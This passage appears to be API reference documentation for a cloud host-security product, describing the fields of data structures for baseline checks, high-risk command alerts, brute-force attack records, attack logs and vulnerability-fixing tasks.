FailCount | Integer | Risky item Note: This field may return null, indicating that no valid values can be obtained. |
FirstScanTime | String | First check time Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Risky item processing status. 0: failed; 1: passed. Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host alias Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
MaxStatus | Integer | Check status Note: This field may return null, indicating that no valid values can be obtained. |
Host information of Top server risks
Used by actions: DescribeBaselineHostTop.
Name | Type | Description |
---|---|---|
EventLevel | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Baseline host information
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
HostId | String | Host ID |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostTag | String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Private IP address Note: This field may return null, indicating that no valid values can be obtained. |
WanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Host Detection
Used by actions: DescribeBaselineHostDetectList.
Name | Type | Description |
---|---|---|
HostId | String | Host ID |
HostIp | String | Private IP address |
HostName | String | Host name |
WanIp | String | Public IP address |
DetectStatus | Integer | 0: Failed; 1: Ignored; 3: Passed; 5: Under detection |
PassedItemCount | Integer | Number of Passed Tasks in Detection |
ItemCount | Integer | Associated Detection Item Count |
NotPassedItemCount | Integer | Detection Failure Count |
FirstTime | String | First detection time |
LastTime | String | Last detection Time |
Uuid | String | CWPP UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline affected servers list data
Used by actions: DescribeBaselineHostTop.
Name | Type | Description |
---|---|---|
EventLevelList | Array of BaselineEventLevelInfo | List of event levels and occurrences Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Score | Integer | Score for calculating weight Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Information
Used by actions: DescribeBaselineList.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
RuleCount | Integer | Number of check items Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected servers Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Pass status. 0: passed; 1: failed. Note: This field may return null, indicating that no valid values can be obtained. |
CategoryId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
MaxStatus | Integer | 5: checking Note: This field may return null, indicating that no valid values can be obtained. |
BaselineFailCount | Integer | Baseline check items with risks Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Item
Used by actions: DescribeBaselineItemList.
Name | Type | Description |
---|---|---|
ItemId | Integer | Item ID |
ItemName | String | Item Name |
CategoryId | Integer | Detection Item Classification |
ItemDesc | String | Item Description |
FixMethod | String | Fixing Method |
RuleName | String | Rule |
DetectResultDesc | String | Check result description Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level Note: This field may return null, indicating that no valid values can be obtained. |
DetectStatus | Integer | Detection Status. 0: Failed; 1: Ignored; 3: Passed; 5: Under detection Note: This field may return null, indicating that no valid values can be obtained. |
HostId | String | Host ID Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
WanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First Occurrence Time Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last Occurrence Time Note: This field may return null, indicating that no valid values can be obtained. |
CanBeFixed | Integer | Can Be Fixed or Not Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host Security UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline detection item
Used by actions: DescribeBaselineItemDetectList.
Name | Type | Description |
---|---|---|
ItemId | Integer | Item ID Note: This field may return null, indicating that no valid values can be obtained. |
ItemName | String | Item Name Note: This field may return null, indicating that no valid values can be obtained. |
ItemDesc | String | Item Description Note: This field may return null, indicating that no valid values can be obtained. |
FixMethod | String | Fixing Method Note: This field may return null, indicating that no valid values can be obtained. |
RuleName | String | Rule Note: This field may return null, indicating that no valid values can be obtained. |
DetectStatus | Integer | 0: Failed; 1: Ignored; 3: Passed; 5: Under detection Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected servers Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First detection time Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last Detection Time Note: This field may return null, indicating that no valid values can be obtained. |
DetectResult | String | Detection result, JSON string Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
PassedHostCount | Integer | Number of servers passed Note: This field may return null, indicating that no valid values can be obtained. |
NotPassedHostCount | Integer | Number of servers failed Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Information
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
ItemId | Integer | Baseline Detection Item ID |
ItemName | String | Detection Item Name |
RuleId | Integer | ID of the Rule to Which the Detection Item Belongs Note: This field may return null, indicating that no valid values can be obtained. |
ItemDesc | String | Detection item description |
FixMethod | String | Remediation Method for Inspection Items |
RuleName | String | Rule Name of Detection Item |
Level | Integer | Risk level |
SysRuleId | Integer | System Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
RelatedCustomRuleInfo | Array of BaselineCustomRuleIdName | Referenced Custom Rule Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline policy information
Used by actions: DescribeBaselinePolicyList, ModifyBaselinePolicy.
Name | Type | Required | Description |
---|---|---|---|
PolicyName | String | Yes | Policy name, which is no more than 128 English characters in length. |
DetectInterval | Integer | Yes | Detection interval [1: 1 day|3: 3 days|5: 5 days|7: 7 days] |
DetectTime | String | Yes | Detection time |
IsEnabled | Integer | Yes | Whether enabled [0: not enabled|1: enabled] |
AssetType | Integer | Yes | Asset type [0: all Professional and Ultimate editions|1: ID|2: IP] |
PolicyId | Integer | No | Policy ID |
RuleCount | Integer | No | Number of associated baseline items |
ItemCount | Integer | No | Number of associated baseline items |
HostCount | Integer | No | Number of associated baseline hosts |
RuleIds | Array of Integer | No | Rule ID |
HostIds | Array of String | No | Host ID |
HostIps | Array of String | No | Host IP |
IsDefault | Integer | No | Whether it is the system default |
Baseline detection information
Used by actions: DescribeBaselineRule.
Name | Type | Description |
---|---|---|
RuleName | String | Detection item name |
Description | String | Detection item description |
FixMessage | String | Fixing suggestion |
Level | Integer | Severity level |
Status | Integer | Status |
RuleId | Integer | Detection Item ID |
LastScanAt | String | Last detection Time |
RuleRemark | String | Specific reason explanation |
Uuid | String | Unique UUID |
EventId | Integer | Unique event ID |
Information on TOP baseline detection item
Used by actions: DescribeBaselineTop.
Name | Type | Description |
---|---|---|
RuleName | String | Baseline detection item name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Detection item hazard level Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Total number of events Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Detection Item ID Note: This field may return null, indicating that no valid values can be obtained. |
Baseline weak password
Used by actions: DescribeBaselineWeakPasswordList.
Name | Type | Required | Description |
---|---|---|---|
PasswordId | Integer | Yes | Password ID |
WeakPassword | String | Yes | Password |
CreateTime | String | No | Creation time |
ModifyTime | String | No | Modification time |
High-risk command data
Used by actions: DescribeBashEvents.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Server ID |
Hostip | String | Host private IP address |
User | String | Username for execution |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk; 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status: 0 - pending; 1 - processed; 2 - allowlisted; 3 - ignored |
CreateTime | String | Occurrence time |
MachineName | String | Server name |
DetectBy | Integer | 0: bash log; 1: real-time monitoring (thunder edition) Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category: 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host HostName Note: This field may return null, indicating that no valid values can be obtained. |
High-risk command data (new)
Used by actions: DescribeBashEventsNew.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
User | String | Username for execution |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1: high-risk; 2: medium-risk; 3: low-risk |
Status | Integer | Processing status: 0: pending; 1: processed; 2: allowlisted; 3: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
DetectBy | Integer | 0: bash log; 1: real-time monitoring (Leiting edition) Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category. 0: system rule; 1: user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
MachineType | Integer | 0: normal; 1: Professional edition; 2: Ultimate edition Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional Information on Machine Note: This field may return null, indicating that no valid values can be obtained. |
Details of high-risk command data
Used by actions: DescribeBashEventsInfo.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | Yunjing ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID. A value of 0 indicates that the rule has been deleted or its effective scope has been modified. |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk; 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status. 0: Pending; 1: Processed; 2: Whitelisted; 3: Ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category: 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: command execution; ssh_service: ssh service IP; ssh_source: log-in source Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution Note: This field may return null, indicating that no valid values can be obtained. |
HarmDescribe | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Tag Note: This field may return null, indicating that no valid values can be obtained. |
References | Array of String | Reference link Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: OFFLINE; ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in user Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
DetectBy | String | Data source Note: This field may return null, indicating that no valid values can be obtained. |
Details of high-risk command data (new)
Used by actions: DescribeBashEventsInfoNew.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID. A value of 0 indicates that the rule has been deleted or its effective scope has been modified. |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk; 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status: 0: Pending; 1: Processed; 2: Whitelisted; 3: Ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category. 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: command execution; ssh_service: ssh service IP; ssh_source: log-in source Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution Note: This field may return null, indicating that no valid values can be obtained. |
HarmDescribe | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Tag Note: This field may return null, indicating that no valid values can be obtained. |
References | Array of String | Reference link Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: OFFLINE; ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in user Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
MachineType | Integer | 0: normal; 1: professional version; 2: ultimate edition Note: This field may return null, indicating that no valid values can be obtained. |
DetectBy | Integer | Source of Detection: 0: bash log; 1: real-time monitoring Note: This field may return null, indicating that no valid values can be obtained. |
High-risk command policy
Used by actions: DescribeBashPolicies, ModifyBashPolicy.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Policy name |
Enable | Integer | Yes | 1: valid; 0: invalid |
White | Integer | Yes | 0: blocklist; 1: allowlist |
BashAction | Integer | Yes | 0: alarm; 1: allowlist; 2: intercept |
Rule | String | Yes | Regular expression |
Level | Integer | Yes | Risk level (0: none; 1: high-risk; 2: medium-risk; 3: low-risk) |
Scope | Integer | Yes | Effective scope (0: a group of QUUID; 1: all professional editions (including ultimate edition); 2: all ultimate editions; 3: all hosts) |
Id | Integer | No | Policy ID |
Descript | String | No | Policy description Note: This field may return null, indicating that no valid values can be obtained. |
EventId | Integer | No | The EventId must be passed in when the event is added to the allowlist. Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | No | Whether to process old events as allowlisted ones: 0 - no; 1 - yes Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | No | A collection of QUUIDs for effective hosts Note: This field may return null, indicating that no valid values can be obtained. |
Category | Integer | No | Policy type: 0 - system; 1 - user |
CreateTime | String | No | Creation time |
ModifyTime | String | No | Modification time |
Uuids | Array of String | No | Compatibility with older versions may be needed. |
High-risk command rules
Used by actions: DescribeBashRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
Name | String | Rule name |
Level | Integer | Risk level (0: none, 1: high-risk, 2: medium-risk, 3: low-risk) |
Rule | String | Regular expression |
Operator | String | Operator |
IsGlobal | Integer | Whether it is a global rule |
Status | Integer | Status (0: valid; 1: invalid) |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Uuids | Array of String | Arrays of UUIDs for servers to be effective Note: This field may return null, indicating that no valid values can be obtained. |
White | Integer | 0: blocklist; 1: allowlist Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | Whether to process previous events: 0: do not process; 1: process Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Rule description Note: This field may return null, indicating that no valid values can be obtained. |
Security report article details
Used by actions: DescribeSecurityBroadcastInfo.
Name | Type | Description |
---|---|---|
Title | String | Article name Note: This field may return null, indicating that no valid values can be obtained. |
GotoType | Integer | Redirection location: 0: no redirection; 1: virus scanning; 2: vulnerability scan; 3: security baseline Note: This field may return null, indicating that no valid values can be obtained. |
Subtitle | String | Subtitle |
CreateTime | String | Release time |
Content | String | Rich text content information |
Id | Integer | Article unique ID |
Type | Integer | Type: 0: emergency notification; 1: feature update; 2: industry honor; 3: version release |
Security report list
Used by actions: DescribeSecurityBroadcasts.
Name | Type | Description |
---|---|---|
Title | String | Article name Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Type: 0: emergency notification; 1: feature update; 2: industry honor; 3: version release Note: This field may return null, indicating that no valid values can be obtained. |
Subtitle | String | Subtitle |
CreateTime | String | Release time |
Id | Integer | Article unique ID |
Level | Integer | Severity level. 0: none; 1: critical; 2: high-risk; 3: medium-risk; 4: low-risk |
Password cracking list entity
Used by actions: DescribeBruteAttackList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
Uuid | String | CWPP client UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Username Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | String | Source IP address Note: This field may return null, indicating that no valid values can be obtained. |
Status | String | SUCCESS: cracking successful; FAILED: cracking failed Note: This field may return null, indicating that no valid values can be obtained. |
Country | Integer | Country/Region ID Note: This field may return null, indicating that no valid values can be obtained. |
City | Integer | City ID Note: This field may return null, indicating that no valid values can be obtained. |
Province | Integer | Province ID Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
BanStatus | Integer | 0: no blocking (not supported for the client version); 1: blocked; 2: blocking failed (program exception); 3: no blocking (do not block for the private network); 4: availability zone does not support blocking; 10: blocking; 81: no blocking (blocking disabled); 82: no blocking (non-Pro Edition); 83: no blocking (added to the allowlist); 86: no blocking (system allowlist); 87: no blocking (client offline) Note: This field may return null, indicating that no valid values can be obtained. |
EventType | Integer | Event type. 200: brute force cracking event; 300: event of successful brute force cracking (page display); 400: event of brute force cracking on a non-existent account. Note: This field may return null, indicating that no valid values can be obtained. |
Count | Integer | Occurrence count Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Machine UUID Note: This field may return null, indicating that no valid values can be obtained. |
IsProVersion | Boolean | Whether it is of the Pro Edition (true/false) Note: This field may return null, indicating that no valid values can be obtained. |
Protocol | String | Username of the attacked service Note: This field may return null, indicating that no valid values can be obtained. |
Port | Integer | Port Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last attack time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
DataStatus | Integer | 0: pending; 1: ignored; 5: fixed; 6: added to allowlist Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Location | String | Geo-location in Chinese Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Threat level. 0: low-risk; 1: medium-risk; 2: high-risk. Note: This field may return null, indicating that no valid values can be obtained. |
DataFrom | Integer | Event source. 0: blocking rule; 1: threat intelligence. Note: This field may return null, indicating that no valid values can be obtained. |
AttackStatusDesc | String | Description of the brute force cracking status Note: This field may return null, indicating that no valid values can be obtained. |
BanExpiredTime | String | Blocking expiration time (valid only for events in blocking status) Note: This field may return null, indicating that no valid values can be obtained. |
Standard blocking mode rule
Used by actions: ModifyBruteAttackRules.
Name | Type | Required | Description |
---|---|---|---|
TimeRange | Integer | Yes | Timeframe of the brute force event (unit: second) |
LoginFailTimes | Integer | Yes | Number of failed attempts during the brute force event |
List of rules for determining brute force cracking
Used by actions: DescribeBruteAttackRules.
Name | Type | Description |
---|---|---|
TimeRange | Integer | Timeframe of the brute force cracking event (unit: second) |
LoginFailTimes | Integer | Number of failed attempts during the brute force cracking event |
Enable | Boolean | Whether the rule is empty. If yes, fill in the default rule. |
TimeRangeDefault | Integer | Occurrence time range of brute force cracking events, in seconds (default rule) |
LoginFailTimesDefault | Integer | Number of failed brute force cracking events (default rule) |
CKafka instance information
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
InstanceID | String | Instance ID |
InstanceName | String | Instance name |
KafkaVersion | String | Version No. |
TopicList | Array of CKafkaTopicInfo | Topic list Note: This field may return null, indicating that no valid values can be obtained. |
RouteList | Array of CKafkaRouteInfo | Routing List |
DiskSize | Integer | Disk capacity (unit: GB) |
VpcId | String | vpcId. Leaving it blank indicates a basic network. |
SubnetId | String | Subnet ID |
Healthy | Integer | Status: 1 - healthy; 2 - alarm; 3 - abnormal instance status |
Zone | String | Availability zone |
Az | String | Region |
Bandwidth | Integer | Instance bandwidth (unit: Mbps) |
CKafka domain name information
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
RouteID | Integer | Routing ID |
Domain | String | Domain name |
DomainPort | Integer | Domain Port |
Vip | String | Virtual IP |
VipType | Integer | Virtual IP Type |
AccessType | Integer | Access type |
CKafka topic name
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
TopicID | String | Topic ID |
TopicName | String | Topic name |
Host information for batch vulnerability fixing
Used by actions: DescribeCanFixVulMachine.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
HostList | Array of VulInfoHostInfo | Information on hosts where this vulnerability can be fixed Note: This field may return null, indicating that no valid values can be obtained. |
FixTag | Array of String | Fixing prompt tag Note: This field may return null, indicating that no valid values can be obtained. |
VulCategory | Integer |
Information on machine with non-isolatable Trojan
Used by actions: DescribeCanNotSeparateMachine.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
Alias | String | Server name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP |
Reason | Integer | Reason for isolation failure: 1 - agent offline |
Component statistics
Used by actions: DescribeComponentStatistics.
Name | Type | Description |
---|---|---|
Id | Integer | Component ID |
MachineNum | Integer | Number of hosts |
ComponentName | String | Component name |
ComponentType | String | Component type |
Description | String | Component description |
Create QUUIDs for fixing tasks
Used by actions: CreateVulFix.
Name | Type | Required | Description |
---|---|---|---|
VulId | Integer | Yes | Vulnerability ID |
Quuids | Array of String | Yes | Hosts that need to fix vulnerabilities. All hosts need to have the vulnerability with the ID of VulId and be in a pending fix status. |
FixMethod | Integer | No |
Default policy basic information
Used by actions: DescribeBaselineDefaultStrategyList.
Name | Type | Description |
---|---|---|
StrategyName | String | Policy name |
StrategyId | Integer | Policy ID |
Network attack log
Used by actions: DescribeAttackLogs.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
SrcIp | String | Source IP |
SrcPort | Integer | Source port |
HttpMethod | String | Attack method |
HttpCgi | String | Attack description |
HttpParam | String | Attack parameter |
VulType | String | Threat type |
CreatedAt | String | Attack time |
MachineIp | String | Target server IP |
MachineName | String | Target server name |
DstIp | String | Target IP |
DstPort | Integer | Target port |
HttpContent | String | Attack content |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Log shipping type details
Used by actions: DescribeLogKafkaDeliverInfo, ModifyLogKafkaAccess.
Name | Type | Required | Description |
---|---|---|---|
SecurityType | Integer | Yes | Security module type. 1: intrusion detection; 2: vulnerability management; 3: baseline management; 4: advanced defense; 5: client security; 6: asset fingerprint; 7: host list; 8: client reporting. |
LogType | Array of Integer | Yes | Type of logs of the security module |
TopicId | String | Yes | Topic ID |
TopicName | String | Yes | Topic name |
Switch | Integer | Yes | Shipping enabling status. 0: disabled; 1: enabled. |
Status | Integer | No | Shipping status. 0: disabled; 1: normal; 2: abnormal. |
ErrInfo | String | No | Error message |
StatusTime | Integer | No | Timestamp of last status reporting |
LogName | String | No | Logset name |
LogSetId | String | No | Logset ID |
Region | String | No | Logset region |
Batch add to allowlists
Used by actions: AddLoginWhiteLists, CreateBanWhiteList.
Name | Type | Description |
---|---|---|
Quuid | String | Quuid Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Uuid Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Id |
Expert service - emergency response information
Used by actions: DescribeEmergencyResponseList.
Name | Type | Description |
---|---|---|
TaskId | String | Task ID |
HostNum | Integer | Number of hosts |
Status | Integer | |
StartTime | String | Service start time |
EndTime | String | Service end time |
ReportPath | String | Report download link |
Emergency vulnerability information
Used by actions: DescribeEmergencyVulList.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
VulName | String | Vulnerability name |
PublishDate | String | Release date |
Category | Integer | Vulnerability category |
Status | Integer | Vulnerability status. 0: not detected; 1: at risk; 2: not at risk; 3: show progress during check |
LastScanTime | String | Last scan time |
Progress | Integer | Scan progress |
CveId | String | CVE ID Note: This field may return null, indicating that no valid values can be obtained. |
CvssScore | Float | CVSS score Note: This field may return null, indicating that no valid values can be obtained. |
Labels | String | Vulnerability tags. Multiple tags are separated by commas. Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected machines Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportDefense | Integer | Whether to support defense: 0: no; 1: yes Note: This field may return null, indicating that no valid values can be obtained. |
DefenseAttackCount | Integer | Number of Attacks Defended Note: This field may return null, indicating that no valid values can be obtained. |
Method | Integer | Detection rule: 0: version comparison; 1: POC verification Note: This field may return null, indicating that no valid values can be obtained. |
AttackLevel | Integer | Attack intensity level Note: This field may return null, indicating that no valid values can be obtained. |
DefenseState | Boolean | Whether vulnerability defense is enabled on hosts with vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Unprocessed security event statistics
Used by actions: DescribeSecurityEventStat.
Name | Type | Description |
---|---|---|
EventsNum | Integer | Number of events |
MachineAffectNum | Integer | Number of affected hosts |
Expert service order information
Used by actions: DescribeAvailableExpertServiceDetail, DescribeExpertServiceOrderList.
Name | Type | Description |
---|---|---|
OrderId | Integer | Order ID |
InquireType | Integer | Order type. 1: emergency; 2: Ultimate Edition important period guarantee; 3: security manager. |
InquireNum | Integer | Number of services |
BeginTime | String | Service start time |
EndTime | String | Service end time |
ServiceTime | Integer | Service duration, in months |
Status | Integer | Order status. 0: not started; 1: in service; 2: expired; 3: completed; 4: refunded and terminated. |
Task list of downloaded logs
Used by actions: DescribeLogExports.
Name | Type | Description |
---|---|---|
ExportId | String | Task ID of exported logs |
Query | String | Query statements of log export |
FileName | String | Filenames of exported logs |
FileSize | Integer | Log file size |
Order | String | Sorting of log export time |
Format | String | Log export format |
Count | Integer | Number of logs to be exported |
Status | String | Log download status. Processing: export in progress; Completed: export completed; Failed: export failed; Expired: log export expired (valid for 3 days). |
StartTime | Integer | Start time of log export, with a millisecond-level UNIX timestamp |
EndTime | Integer | End time of log export, with a millisecond-level UNIX timestamp |
CosPath | String | Log export path |
CreateTime | String | Creation time of log export |
Quick analysis of statistics data
Used by actions: DescribeFastAnalysis.
Name | Type | Description |
---|---|---|
Count | Integer | Number |
Ratio | Float | Ratio |
Value | String | Value |
Core file monitoring event
Used by actions: DescribeFileTamperEvents.
Name | Type | Description |
---|---|---|
HostName | String | Machine Name |
HostIp | String | Machine IP |
CreateTime | String | Occurrence time |
ModifyTime | String | Last occurrence time |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Quuid | String | CVM ID |
Type | Integer | Event Type/Action. 0 - Alarm |
ProcessExe | String | Process path |
ProcessArgv | String | Process parameter |
Target | String | Target file path |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
EventCount | Integer | Event Occurrences |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
Pstree | String | Event Details: JSON Format |
RuleCategory | Integer | Rule Type. 0 - System Rule; 1 - Custom Rule |
MachineStatus | String | Host Online Information: ONLINE, OFFLINE |
Description | String | Severity description |
Suggestion | String | Remediation Suggestions |
PrivateIp | String | Private IP address |
ExePermission | String | Process permission |
UserName | String | Username |
UserGroup | String | User group |
ExeMd5 | String | Process name |
ExeSize | Integer | Process File Size |
ExeTime | Integer | Process Execution Duration |
TargetSize | Integer | Target file size |
TargetPermission | String | Target File Permissions |
TargetModifyTime | String | Target File Update Time Note: This field may return null, indicating that no valid values can be obtained. |
TargetCreatTime | String | Target File Creation Time Note: This field may return null, indicating that no valid values can be obtained. |
